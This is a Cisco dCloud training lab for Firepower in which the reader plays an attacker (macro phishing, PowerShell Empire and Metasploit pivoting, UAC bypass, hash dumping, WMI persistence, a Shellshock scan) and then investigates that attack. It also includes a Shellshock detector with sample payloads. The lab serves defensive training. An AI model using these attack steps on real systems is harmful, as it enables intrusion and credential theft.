NOTE: The lab assumes an understanding of techniques used by attackers in the Attack Kill Chain.
Scenario 1: The Attack. Assume the role of an attacker and perform a realistic attack against the target organization: use phishing
with a malicious Excel file to take control of a client inside the network, then leverage the compromised client to attack
other systems on the inside.
Scenario 2: Getting Started with Firepower Management Center. Become familiar with the Firepower Management Center
(FMC) in order to understand its overall structure, including how FMC automatically discovers the network it is
protecting: the hosts, their operating systems, the applications, the relevant vulnerabilities, and the logged-in users. This scenario also looks at a typical
NGFW policy, including how to create policies that control applications and leverage user identity from Cisco
Identity Services Engine (ISE).
Scenario 3: Detection and Analysis. Investigate a reported attack (the one from Scenario 1) using Firepower Management
Center, looking at Indicators of Compromise (IoCs) and correlating events from IPS, Advanced Malware Protection (AMP),
and Security Intelligence to understand the attack and its impact.
Visit Cisco dCloud Help pages at https://dcloud-cms.cisco.com/help for more information and training materials.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 1 of 54
Cisco dCloud
Requirements
The table below outlines the requirements for this preconfigured demonstration.
Table 1. Requirements
Required: Laptop
Optional: Cisco AnyConnect
Topology
This content includes preconfigured users and components to illustrate the scripted scenarios and features of the solution. Most
components are fully configurable with predefined administrative user accounts. You can see the IP address and user account
credentials to use to access a component by clicking the component icon in the Topology menu of your active session and in the
scenario steps that require their use.
Evilkali1 and Evilkali2: these are the systems that launch the attacks in Scenario 1.
Workstation A and Workstation B: these are clients inside the target organization. These clients connect to their network via
VPN (AnyConnect). With this, we illustrate both how Firepower Management Center can get user identity from ISE, and how
FMC can automatically put an offending endpoint in quarantine.
The VPN clients have physical IP addresses (198.18.133.x) and virtual IP addresses for VPN (198.19.19.x). The student
connects to the physical IP addresses when accessing these machines, but the addresses seen after VPN termination (and therefore by FMC) are
198.19.19.x.
IoT surveillance camera: this is the ultimate target of the attack in this scenario.
Get Started
BEFORE PRESENTING
Cisco dCloud strongly recommends that you perform the tasks in this document with an active session before presenting in front
of a live audience. This will allow you to become familiar with the structure of the document and content.
It may be necessary to schedule a new session after following this guide in order to reset the environment to its original
configuration.
Follow the steps to schedule a session of the content and configure your presentation environment.
1. Browse to dcloud.cisco.com, select the location closest to you, and log in with your Cisco.com credentials.
2. (Optional) Register and configure your router if this is the first time you will use the router with dCloud. [Show Me How]
5. Verify that the status of your session is Active in My Dashboard > My Sessions.
7. For best performance, connect to the Jumper with Cisco AnyConnect VPN [Show Me How] and the local RDP client on
your laptop [Show Me How]
NOTE: You can also connect to the workstation using the Cisco dCloud Remote Desktop client [Show Me How]. The dCloud
Remote Desktop client works best for accessing an active session with minimal interaction. However, many users experience
connection and performance issues with this method.
8. On the workstation, open Firefox and connect to the Firepower Management Center at https://fmc.
9. Test connectivity to Workstation A by clicking the icon on the desktop, then click Use another account and log in with
Username: DCLOUD\mordiac and Password: C1sco12345. Click OK.
10. Repeat the steps to test connectivity to Workstation B by clicking the icon on the desktop, then click Use another account and
log in this time with Username: DCLOUD\scratchy and Password: C1sco12345. Click OK.
11. From Workstation A, test connectivity to the critical IoT device (which contains incredibly sensitive information) by opening
the Chrome Browser, and navigating to http://iot.dcloud.cisco.com.
13. Choose the machine, click Load, and then click Open. Log in using username root and password C1sco12345.
There are two employees, Scratchy (CFO) and Mordiac (IT admin), who are looking for new jobs (both just updated their
LinkedIn profiles). This is the pretext the phishing lure below is built on.
Steps
1. From the workstation, open an SSH window and connect to evil2 (198.18.133.111). Log on with root/C1sco12345.
Figure 6. Log in
2. Attempt to reach the internal server iot.dcloud.cisco.com directly from the attacking machine. Scan it with nmap to see if it
has ports 80 or 443 open. -P0 (the older spelling of -Pn) skips host discovery, so nmap probes the ports even though the host does not answer pings.
nmap -P0 198.19.10.211 -p 80,443
NOTE: Nmap (https://nmap.org) is a well-known tool for attackers and penetration testers that does port scanning and much more.
3. The result below shows that the attacker cannot reach the machine directly. Note the word filtered: no response came back at all, which usually means a firewall is silently dropping the probes rather than the port being closed.
root@evilkali2:~# nmap -P0 198.19.10.211 -p 80,443
4. Since the attacker cannot access the target directly, an attempt will be made to compromise a client computer. The attacker has
prepared a number of Excel files with malicious macros and has tried to make sure they bypass antivirus.
5. On evil2, start PowerShell Empire and wait for a naive end user to open the Excel file.
root@evilkali2:~# cd /opt/Empire
root@evilkali2:/opt/Empire# ./empire
NOTE: PowerShell Empire is a post-exploitation framework for Windows environments. Empire uses PowerShell (a
built-in scripting language in Windows) to do its work, which can be very stealthy and difficult to detect because no new binary has to be dropped. It is typically used at later
stages of the attack kill chain (privilege escalation, lateral movement, persistence), but in this lab we also use it for the initial
exploitation.
7. Use Remote Desktop to access WorkstationA (login with DCLOUD\mordiac and password C1sco12345).
8. Verify that AnyConnect VPN session is established by clicking on the arrow in bottom right corner. Click the AnyConnect
icon. If you are not connected, press the connect button.
11. This displays a number of Excel files to download. Click the link Catjob2.xls and try to download it. It will fail, because this
known malware can be stopped immediately.
12. Click Job-Obscene-Salary.xls. This file is a zero-day, carefully coded to bypass defenses.
NOTE: You may be prompted to Enable Editing and Enable Content. These are security measures, and are designed to
discourage end users from running macros. However, using social engineering it is often possible to bypass this defense.
NOTE: Do NOT quit the Excel application until after this lab.
15. Return to the SSH console on evilkali2. The screen should now show that PowerShell Empire has received its first agent check-in.
16. That shows that the Excel file was malicious. Check whether any of the AV vendors on VirusTotal would have picked it up.
17. From WorkstationA, open a tab in the browser and navigate to http://virustotal.com to submit the file.
18. Submit the newly downloaded file. Your output should look like below. Most likely, very few (if any) AV vendors detected the
file as malicious.
19. On your evilkali2 SSH console with Empire, go to agents mode and watch your agent. The name is random.
(Empire) > agents
[*] Active agents:
  Name              Internal IP   Machine Name  Username        Process          Delay  Last Seen
  ---------         -----------   ------------  --------        -------          -----  ---------
  XZ1D4KMFFBS2CPC1  198.19.30.38  WORKSTATIONA  DCLOUD\mordiac  powershell/2936  5/0.0  2016-03-17 18:16:56
20. Change the name to something shorter, for example, the letter A.
NOTE: Use <tab> to complete command so you only have to type the first letter of the Agent Name.
(Empire: agents) > rename <name of agent as per above> A
NOTE: You can use <tab> and only type Interact plus the first letter of the agent (in picture above that would be interact X + tab).
(Empire: agents) > interact A
(Empire: A) >
22. Verify that we can now control the machine, change directory, list files, steal files, upload files.
23. Empire has many different modules (written in PowerShell), some of which we will use during this lab. To show the control we
have right now, use the module trollsploit/message. Once in a module you can see its configurable parameters by typing info.
(Empire: A) > usemodule trollsploit/message
(Empire: trollsploit/message) > info
Options:
  Name     Required  Value                                     Description
  ----     --------  -----                                     -----------
  MsgText  True      Lost contact with the Domain Controller.  Message text to display.
Then run the module by typing run.
NOTE: This is not so stealthy, so a real attacker would not do this without a good reason (such as to show a message box that
prompts for username passwords to gather credentials).
25. Next the attacker wants to elevate privileges. This is very easy here since Mordiac was (foolishly)
logged in with an administrator account, so all that is needed is to bypass Microsoft UAC (User Account Control); see
http://www.powershellempire.com/?page_id=380.
26. From evilkali2, type back to return to interacting with A, then bypassuac test (test is the name of the listener) and answer yes
to the warning that the module is not opsec safe (meaning it touches the hard disk, leaving traces that AV or defensive tools could
detect).
27. The output displays (the name of the agent will vary), meaning you will have a new agent connection but with higher
privileges.
29. Enter agents and note which session has an asterisk (*) in the Username column.
(Empire: A) > agents
[*] Active agents:
  Name              Internal IP    Machine Name  Username         Process          Delay  Last Seen
  ---------         -----------    ------------  --------         -------          -----  ---------
  A                 198.18.133.38  WORKSTATIONA  DCLOUD\mordiac   powershell/3484  5/0.0  2016-03-28 19:28:26
  MZK3MLW4PGPFZNU1  198.18.133.38  WORKSTATIONA  *DCLOUD\mordiac  powershell/2228  5/0.0  2016-03-28 19:28:26
30. Rename the session with an asterisk to (for example) AA and interact with it.
NOTE: Remember you only need to type the first character(s) of agent name and then TAB.
(Empire: agents) > rename MZK3MLW4PGPFZNU1 AA
(Empire: agents) > interact AA
(Empire: AA) >
31. The attacker now has an elevated session (the asterisk marks a high-integrity agent), which gives full administrative control of the local machine,
including modifying system files and dumping password hashes.
33. The output will look similar to the below; if you scroll up you will see passwords and password hashes.
NOTE: Remember the attacker's objective: to break into the IoT device iot.dcloud.cisco.com at 198.19.10.211. In order to do so
he may need to add new tools to the toolbox.
NOTE: We are now going to hand control of the compromised client to another attack framework: Metasploit. While
PowerShell Empire allows for very easy and stealthy post-exploitation in a Windows environment using the PowerShell scripting
language, Metasploit can be used to attack any system regardless of operating system.
34. Keep the SSH window to evil2 open, but start a new SSH session to evil2 (198.18.133.111) and log on with
root/C1sco12345.
35. Start metasploit console (msfconsole) with the script file multi.rc.
root@evilkali2:~# msfconsole -r multi.rc
NOTE: We now have two SSH sessions to evil2. In the first we are running PowerShell Empire, a formidable post-exploitation
framework for Windows environments. But in order to attack the Linux-based IoT device we want to create an alternative
control channel to the Metasploit framework (our second SSH session).
37. From the first SSH session with Empire, while interacting with the elevated agent, enter the following
commands. This injects shellcode that opens an outbound HTTP command-and-control session to your Metasploit listener.
(Empire: AA) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > set Listener Meterpreter
(Empire: code_execution/invoke_shellcode) > set Payload reverse_http
(Empire: code_execution/invoke_shellcode) > run
38. Now watch your second SSH session (the one with Metasploit listening). The output should look similar to below, indicating
that we now control the compromised client from Metasploit framework.
39. In the second SSH session (with metasploit), create a route to allow the Metasploit framework to attack targets on the inside of
the network via the compromised client using meterpreter session 1.
NOTE: Understand how the attack is going via the compromised client, even though the IoT device is not reachable directly.
40. Finally, attack the IoT device through the existing meterpreter session.
41. From the second SSH window (with the meterpreter session), invoke the Metasploit resource script iot2.rc, which sets up the
attack to scan for the Bash Shellshock vulnerability (CVE-2014-6271). Even though this vulnerability dates from September 2014,
the attacker has some hope because IoT systems are often not patched regularly.
msf exploit(handler) > resource iot2.rc
[*] Processing iot2.rc for ERB directives.
resource (iot2.rc)> use auxiliary/scanner/http/apache_mod_cgi_bash_env
resource (iot2.rc)> set targeturi /cgi-bin/vulnerable.cgi
targeturi => /cgi-bin/vulnerable.cgi
NOTE: If successful, the module makes the server execute the Unix id command, proving that it is possible to execute arbitrary
commands on the IoT server (in the context of the www user).
In this case, however, it is not working (no user info is returned), as shown below. The reason (an IPS block) will become clear in Scenario 3.
43. A reasonable next step for the attacker is to gain persistence, meaning a backdoor that survives a reboot. From
the attacker's perspective, preferably one that is not caught by any antivirus. PowerShell Empire (our first SSH session) will
achieve this goal with a permanent WMI event subscription. Defenders can enumerate such subscriptions in the root\subscription WMI namespace
(the __EventFilter, __EventConsumer and __FilterToConsumerBinding classes), which is where to look for this technique on a suspect host.
44. On our first SSH session with Powershell Empire, use the module persistence/elevated/wmi.
(Empire: AA) > usemodule persistence/elevated/wmi
(Empire: persistence/elevated/wmi) > set Listener test
(Empire: persistence/elevated/wmi) > run
[>] Module is not opsec safe, run? [y/N] y
(Empire: persistence/elevated/wmi) >
WMI persistence established using listener test with OnStartup WMI subsubscription trigger.
45. Reboot WorkstationA by typing the following command in the Windows Start window.
shutdown -t 0 -r
NOTE: Be careful typing this. Do not forget -r, or the system will just shut down and not restart.
46. Wait 1-2 minutes and then log in with Remote Desktop.
47. Within about 5 minutes, you will have a new agent connection from the machine, started by the WMI subscription at boot.
Conclusion
The attacker wanted to attack the internal IoT server to control the video camera.
The attacker tried to attack the IoT server directly but was blocked by the firewall (the ports showed as filtered).
The attacker then launched a phishing attack against a naive user on the inside, using zero-day malware packaged as an
Excel macro, and took control of a machine on the inside.
The attacker escalated privileges with a UAC bypass and could dump usernames and password hashes on the machine.
The attacker established persistence (a WMI event subscription), so he will remain in the network even after a reboot.
The attacker then went after the IoT server using the Bash Shellshock attack. This attack failed; maybe an
IPS blocked it, or the server was patched. You will find out in Scenario 3.
The attacker is still in the network and will seek new ways to attack. One of them may be successful.
In this scenario you will see, through the Context Explorer, that Firepower learns about the network it is protecting: the hosts, their operating systems, the applications,
the vulnerabilities and the logged-in users.
You will also see how Firepower's knowledge of the network it is protecting can be used to automatically tune IPS rules,
and how FMC can get identity information from ISE or Active Directory.
Steps
1. From the Workstation, open the Firefox browser and logon to fmc (https://fmc), using username: dcloud and password:
C1sco12345.
2. Select Analysis/Context Explorer and adjust the time period to the last day.
NOTE: Some of the sections may take a long time to load in this virtual setup. The reason for this is being investigated.
3. A key feature of Firepower Management Center (FMC) is that it keeps track of the operating systems and applications used by
each host on the internal network, as well as the logged in users and vulnerabilities. Scroll down to the section on Network
Information. As you can see, FMC has discovered different Operating Systems.
4. Scroll down to Application Protocol Information to examine what applications have been discovered.
NOTE: You can click any slice of a pie chart, or any bar in a bar chart, to filter further or drill
down into analysis (jumping to events). For hosts (IP addresses) it is also possible to view the host profile. Navigate to Network
Information, find 198.19.19.38 (Workstation A) and select View Host Information.
5. Look at the Host Information. This section displays logged in users, Indicators of Compromise, Operating systems,
Applications, and Vulnerabilities for that particular host.
NOTE: Point out the exclamation mark (!) to the left of certain applications. It means Firepower has detected a new
application that is not in the configured whitelist. This whitelist (which can be learned by inspecting traffic to and from a host) can be
used to detect when something changes in the network (such as a new application). This is very useful in static environments
(medical technology networks, SCADA, some DMZs, etc.).
NOTE: The knowledge FMC has gained of the network: The hosts, The Operating Systems, the applications and vulnerabilities
can be used to automatically fine tune the IPS policies.
8. Select Policies > Access Control > Intrusion and edit the dCloud-IPS policy by clicking the pencil symbol.
9. Firepower recommends changes to the IPS configuration based on its knowledge of the network. Click View Recommended
Changes below to see what changes are recommended.
10. Firepower recommends changes to more than 2100 IPS rules, based on its knowledge of the
network. Tuning the IPS rule set both improves performance and reduces the risk of false positives, because rules for operating systems and services that are not present are disabled.
12. To look at NGFW policies, select Policies > Access Control > Access Control and click the pencil symbol.
13. Examine the different options for the NGFW policy. It is possible to have different rules depending on Active Directory Group,
Application, URL category but also attributes from Cisco ISE. For each rule, it is possible to define different IPS policies or
policies for AMP and logging.
14. Try adding a new rule (or edit an existing rule) to examine the options for applications, URLs, Users and ISE attributes. You do
not have to create the rule and can cancel out after investigating what options are available.
15. Examine the SSL decryption policies. Select Policies > Access Control > SSL and edit the Dcloud-SSL policy.
NOTE: It may be desirable in many cases to control when to decrypt SSL for reasons of policy (law and compliance) or
performance.
It is possible to decrypt or not decrypt based on a number of criteria such as source IP address, destination IP address, user identity
(e.g. do not decrypt HR traffic), destination URL category (e.g. do not decrypt finance sites) and so on.
16. On WorkstationA, test the decryption policy by trying to download a malicious file again over https:// from WorkstationA
using Internet Explorer.
17. Navigate to https://www.evilchi.com/Catjob3.xls. This download will not succeed since the Advanced Malware Protection
(AMP) will block this file.
18. Examine Device configuration. Select Devices->Device Management and edit the device vFTD.
NOTE: With Firepower Threat Defense (FTD) software FMC can configure all features such as NAT, Routing (static routes, BGP,
OSPF), DHCP server settings etc. Please feel free to investigate the different options but do please avoid making changes.
Firepower makes it easy to identify hosts that are compromised by collecting Indicators of Compromise (IoCs) per host. An IoC
expresses a reasonable suspicion that a host may be compromised and under the control of somebody else. It is also possible to quickly
understand the context of the host: operating system, running applications, vulnerabilities, malware, logged-in users, and
connections to and from this host.
Steps
1. From the workstation, log in to the Firepower Management Center with Firefox, using https://198.18.133.10 with Username:
dcloud and password: C1sco12345.
2. Select Analysis > Context Explorer. This is a good starting point for the security analyst.
NOTE: Look at the Indications of Compromise (IoCs). One host (198.19.19.38) has experienced many IoCs.
NOTE: FMC collects the Indicators of Compromise per host, making it easy for the security analyst to identify the hosts that
need attention now.
3. The host 198.19.19.38 has several Indicators of Compromise. Have a further look at this host by right-clicking the blue
bar in the Indications of Compromise by Host section and choosing View Host Information.
Figure 45.
4. The Host Information View should open in a different window (see below).
NOTE: Learn more about the machine that may have been compromised.
FMC offers you contextual information about a potentially compromised machine, such as
What malware events (files that are malware) relate to this machine?
5. From Host Profile, check what users have been logged on to the machine.
NOTE: Quiz yourself: why is it important to understand that mordiac has been logged on to the machine?
Not because of financial data: the CFO in this scenario is Scratchy, not Mordiac.
Mordiac is a domain admin, so compromising his credentials with something like Mimikatz would put all the credentials in the whole
organization in jeopardy (including the CFO's, and any future President's).
6. From the Host Profile, check what operating system the compromised machine is running.
7. From the Host Profile, we have Indicators of Compromise. Check what Malware events are associated with this host.
8. Click the red wheel icon to view the Network File Trajectory for this file.
NOTE: The file was allowed at first, since it was a zero day malware.
NOTE: Firepower AMP records every file transfer regardless of the disposition assumed at the time (unknown, clean or malware), and is able to
change its verdict later and tell you about it. This is called retrospection: a file that was allowed while unknown is reported as malware once the verdict changes, together with every host that received it in the meantime.
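The following is an added example, not Firepower code, that models the retrospection mechanism described in the NOTE: every transfer is logged with the disposition known at that moment, and when the cloud verdict changes later the change is applied back to the recorded history, so the analyst can see which hosts received the file while it was still unknown. Hashes, hosts, timestamps and the source address are constructed for the example.

```python
"""Added example (not Firepower code): an in-memory file trajectory with
retrospective conviction. All values are constructed for illustration."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Transfer:
    sha256: str
    src: str
    dst: str
    filename: str
    ts: int                                   # epoch seconds of the transfer
    disposition_at_transfer: str = "unknown"  # verdict known when it crossed the sensor


class FileTrajectory:
    """Records transfers per hash plus the current verdict per hash."""

    def __init__(self):
        self._transfers = defaultdict(list)  # sha256 -> [Transfer, ...]
        self._verdict = {}                   # sha256 -> 'unknown'|'clean'|'malware'
        self.retrospective_events = []       # (ts, sha256, old, new)

    def verdict(self, sha256: str) -> str:
        return self._verdict.get(sha256, "unknown")

    def record(self, t: Transfer) -> str:
        """Log a transfer; block only if the hash is already known malware."""
        t.disposition_at_transfer = self.verdict(t.sha256)
        self._transfers[t.sha256].append(t)
        return "block" if t.disposition_at_transfer == "malware" else "allow"

    def update_verdict(self, sha256: str, new: str, ts: int) -> list:
        """Apply a new cloud verdict (e.g. from dynamic analysis).

        Any change is logged as a retrospective event. If the new verdict is
        malware, return the earlier transfers that were allowed under a
        different disposition: those are the hosts that now need attention.
        """
        old = self.verdict(sha256)
        if old == new:
            return []
        self._verdict[sha256] = new
        self.retrospective_events.append((ts, sha256, old, new))
        if new != "malware":
            return []
        return [t for t in self._transfers[sha256]
                if t.disposition_at_transfer != "malware"]

    def exposed_hosts(self, sha256: str) -> list:
        """Hosts that received the file before it was convicted."""
        return sorted({t.dst for t in self._transfers[sha256]
                       if t.disposition_at_transfer != "malware"})


def demo() -> dict:
    """Walk through the Scenario 1 timeline with constructed values."""
    h = "c0ffee" * 10 + "abcd"          # constructed 64-hex-char SHA-256 placeholder
    src = "203.0.113.10"                # constructed lure-server address (TEST-NET-3)
    traj = FileTrajectory()
    first = traj.record(Transfer(h, src, "198.19.19.38",
                                 "Job-Obscene-Salary.xls", ts=1000))
    # The sandbox verdict arrives an hour later: retrospective conviction.
    flagged = traj.update_verdict(h, "malware", ts=4600)
    # A second host tries the same download afterwards and is blocked outright.
    second = traj.record(Transfer(h, src, "198.19.19.39",
                                  "Job-Obscene-Salary.xls", ts=5000))
    return {
        "first_action": first,                  # 'allow': disposition was unknown
        "second_action": second,                # 'block': hash is now known malware
        "flagged_transfers": len(flagged),      # the one allowed transfer
        "exposed_hosts": traj.exposed_hosts(h),
        "retro_events": len(traj.retrospective_events),
    }


if __name__ == "__main__":
    print(demo())
```

The point of keeping `disposition_at_transfer` separate from the current verdict is exactly what the Network File Trajectory view shows: the first download is correctly displayed as allowed (there was nothing to block it on), and the retrospective event is what turns that history into an incident.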
10. Examine the Threat Score (Dynamic Analysis, or Sandboxing Result). In this case the file was convicted (deemed
malicious) because of Dynamic Analysis (sandboxing). You can get details of the dynamic analysis by clicking
the Threat Score symbol:
NOTE: The Dynamic Analysis Summary shows clear indicators of why this file (which no AV caught at the time) is
malicious.
NOTE: Once the cloud intelligence has identified the file as malicious, it is blocked immediately by any security appliance fed
by the Talos intelligence feed (other Cisco NGFWs, Web Security Appliances, Email Security Appliances or AMP for Endpoints).
11. Verify that the same file (Job-Obscene-Salary.xls) is now blocked immediately.
12. Open your remote desktop connection to Workstation A (the one that was initially compromised).
13. Select the link for Download files and try to download the file again. The download fails.
NOTE: Depending on the browser the file may be partially downloaded, but it is no longer a threat, because the macro-bearing part never arrives.
NOTE: We can quickly see that this is a high-priority, Impact 2 event (host potentially vulnerable); the attack was blocked; the
attacker was the IP of WorkstationA, a client on the inside; the victim was the IoT device; and the attack was a Bash CGI environment
variable injection (a.k.a. Bash Shellshock).
NOTE: This intrusion event corresponds to the Shellshock attempt against the IoT device in Scenario 1 (the scan that returned no user info).
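As an added example (not part of the lab and not the Firepower rule set), the following shows the kind of check behind a "Bash CGI environment variable injection" event: a CGI server copies request headers into environment variables (User-Agent becomes HTTP_USER_AGENT, the query string becomes QUERY_STRING), so any of them can carry the CVE-2014-6271 function-definition pattern. The sample requests are constructed to mirror the scanner module used in Scenario 1, which probes /cgi-bin/ and expects the output of id back.

```python
"""Added example: a minimal Shellshock (CVE-2014-6271) request detector.
Not Cisco/Firepower code; sample requests below are constructed."""
import re

# The bug executes whatever follows "() { ... };" in any environment
# variable that reaches bash. Match "()", a "{...}" body, ";" and then a
# non-space character (the trailing command).
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{.*?\}\s*;\s*\S")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path and a lower-cased header dict."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def shellshock_hits(raw: str) -> list:
    """Return (location, value) for every header or query string carrying the pattern.

    Every header is checked, not just User-Agent: Cookie, Referer and
    custom headers all end up as CGI environment variables too.
    """
    req = parse_request(raw)
    hits = [(name, value) for name, value in req["headers"].items()
            if SHELLSHOCK_RE.search(value)]
    if "?" in req["path"]:
        qs = req["path"].split("?", 1)[1]
        if SHELLSHOCK_RE.search(qs):
            hits.append(("query", qs))
    return hits


# Constructed sample traffic.
PROBE = (
    "GET /cgi-bin/vulnerable.cgi HTTP/1.1\r\n"
    "Host: iot.dcloud.cisco.com\r\n"
    "User-Agent: () { :; }; /usr/bin/id\r\n"
    "Accept: */*\r\n\r\n"
)
COOKIE_PROBE = (
    "GET /cgi-bin/vulnerable.cgi HTTP/1.1\r\n"
    "Host: iot.dcloud.cisco.com\r\n"
    "Cookie: x=() { :;}; echo vulnerable\r\n\r\n"
)
BENIGN = (
    "GET /cgi-bin/status.cgi?lang=en HTTP/1.1\r\n"
    "Host: iot.dcloud.cisco.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("probe", PROBE), ("cookie", COOKIE_PROBE), ("benign", BENIGN)):
        print(label, shellshock_hits(req))
```

This covers the original CVE-2014-6271 shape only; the follow-up parser bugs (CVE-2014-7169 and later) have different trigger strings, which is why a real IPS carries several rules for the family rather than one pattern. The regex also deliberately does not try to decode the body, since the lab's scanner places the payload in a header.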
NOTE: The host appears to be trying to communicate with a host in Singapore (SGP). This is, however, blocked by the NGFW through Security Intelligence.
Conclusion
We first examined the host information, which told us the operating system, applications and so on. It also told us that the user logged
on to the host at the time of the event was mordiac, a domain admin.
Investigating the malware events showed that this host had received an Excel file from a server in China. This file was
retrospectively convicted: at first its disposition was unknown and it had to be allowed into the network, but at a later stage Firepower
changed the verdict to malware.
The dynamic analysis of this file also told us the nature of the file: a macro launching PowerShell.
Complementary analysis from VirusTotal or Threat Grid would have shown that this was zero-day malware.
We also learned that WorkstationA has been attacking the critical IoT server. This attack was blocked by the IPS.
We also learned that WorkstationA is communicating with a known CnC in Singapore (though this traffic is blocked).
Scenario 4. Reporting
In this scenario, we will focus on the FMC Dashboards and Reporting. FMC allows for very rich and customizable data analysis
and reporting. In the short time available we will only touch on this subject briefly.
Steps
1. From the Workstation, open the Firefox browser and logon to fmc (https://fmc), using username: dcloud and password:
C1sco12345.
NOTE: Note that there are many different predefined dashboards (Files, Security Intelligence and many more). Each dashboard
also has different tabs (for example, Network, Threat, Intrusion Events etc).
NOTE: The dashboards can be used both as a graphical overview, for on-demand or scheduled reporting but it is also possible to
use them to drill into analysis, just by clicking on any of the links in the widgets. For example, Clicking on the CnC link under the
Connections by Security Intelligence shows the details of Security Intelligence (Reputation based drops to CnC).
6. Create a new dashboard by copying the Summary Dashboard we just examined. Name your new dashboard and click Create.
8. Select Custom Analysis. This very flexible widget lets us display data from any table with a lot of customization.
9. Customize the new widget by first clicking the top left corner, then choosing the Table (as an example, pick Correlation
Events), then the field you want to display, and optionally any search criteria.
NOTE: It is, for example, very easy to show users in quarantine, or hosts with a high number of NXDOMAIN responses, depending
on the correlation policy.
10. You can convert your (customized) dashboard into a report template. Click Report Designer at the top right of the dashboard.
11. This brings you to the report template design, which starts from your current dashboard structure but still lets you
modify the report: add text or a logo, switch between bar charts, pie charts and so on.
12. When you have finished, click Save and generate your report.
13. When generating the report, make sure to select HTML output (there is no PDF reader on the workstation).
Conclusion